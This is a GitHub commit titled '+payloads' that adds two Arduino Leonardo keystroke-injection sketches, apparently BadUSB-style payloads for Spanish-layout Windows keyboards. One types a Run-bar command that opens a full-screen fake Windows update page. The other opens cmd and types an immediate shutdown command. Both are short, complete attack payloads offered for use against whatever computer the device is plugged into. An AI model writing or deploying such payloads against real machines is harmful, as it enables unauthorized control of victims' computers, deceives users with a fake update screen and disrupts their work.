+payloads

This commit is contained in:
Joel Serna Moreno 2018-05-24 01:20:37 +02:00 committed by GitHub
parent 1ac4c628bd
commit dab274bb81
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
2 changed files with 30 additions and 0 deletions

View File

@ -0,0 +1,16 @@
#include <phukdlib_leonardo.h>
#define kbd_es_es
void setup() {
Keyboard.begin();
}
void loop() {
delay(5000);
CommandAtRunBarMSWIN("iexplore -k http://fakeupdate.net/win7/index.html");
delay(5000);
Keyboard.press(KEY_F11);
delay(100);
Keyboard.releaseAll();
while(1);
}

View File

@ -0,0 +1,14 @@
#include <phukdlib_leonardo.h>
#define kbd_es_es
void setup() {
Keyboard.begin();
}
void loop() {
delay(5000);
CommandAtRunBarMSWIN("cmd");
delay(3000);
Keyboard.println("shutdown /s /t 00");
while(1);
}